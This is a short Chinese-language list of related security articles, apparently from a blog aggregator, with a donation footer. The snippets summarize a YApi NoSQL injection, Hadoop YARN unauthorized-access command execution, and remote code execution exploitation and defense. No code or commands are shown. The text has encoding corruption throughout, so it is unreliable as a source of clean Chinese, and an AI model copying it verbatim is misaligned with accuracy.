    這個(gè)是前幾個(gè)月的漏洞,之前爆出來(lái)發(fā)現(xiàn)沒(méi)人分析就看了一下,也寫(xiě)了一片 Nosql注入的文章,最近生病在家,把這個(gè)寫(xiě)一半的完善一下發(fā)出來(lái)吧。 YApi是一個(gè)可本地部署的、打通前后端及QA的、可視化的接口管理平臺(tái)。 YApi 是 高效 、 易用 、 功能強(qiáng)大 的 api 管理平臺(tái),旨在為

    2023年04月24日
    瀏覽(31)
  • 數(shù)據(jù)庫(kù)安全:Hadoop 未授權(quán)訪(fǎng)問(wèn)-命令執(zhí)行漏洞.

    數(shù)據(jù)庫(kù)安全:Hadoop 未授權(quán)訪(fǎng)問(wèn)-命令執(zhí)行漏洞.

    Hadoop 未授權(quán)訪(fǎng)問(wèn)主要是因?yàn)?Hadoop YARN 資源管理系統(tǒng)配置不當(dāng),導(dǎo)致可以未經(jīng)授權(quán)進(jìn)行訪(fǎng)問(wèn),從而被攻擊者惡意利用。攻擊者無(wú)需認(rèn)證即可通過(guò) RESTAPI 部署任務(wù)來(lái)執(zhí)行任意指令,最終完全控制服務(wù)器。 數(shù)據(jù)庫(kù)安全:Hadoop 未授權(quán)訪(fǎng)問(wèn)-命令執(zhí)行漏洞. Hadoop 未授權(quán)訪(fǎng)問(wèn)-命令執(zhí)行漏

    2024年02月05日
    瀏覽(22)
  • 遠(yuǎn)程代碼執(zhí)行漏洞的利用與防御

    遠(yuǎn)程代碼執(zhí)行漏洞的利用與防御

    全稱(chēng):remote command/code execute 分為遠(yuǎn)程命令執(zhí)行和遠(yuǎn)程代碼執(zhí)行 1.命令執(zhí)行漏洞: 直接調(diào)用操作系統(tǒng)命令 2.代碼執(zhí)行漏洞: 靠執(zhí)行腳本代碼調(diào)用操作系統(tǒng)命令 一般出現(xiàn)這種漏洞,是因?yàn)閼?yīng)用系統(tǒng)從設(shè)計(jì)上需要給用戶(hù)提供指定的遠(yuǎn)程命令操作的接口,比如我們常見(jiàn)的路由器、防

    2024年02月15日
    瀏覽(29)

覺(jué)得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請(qǐng)作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包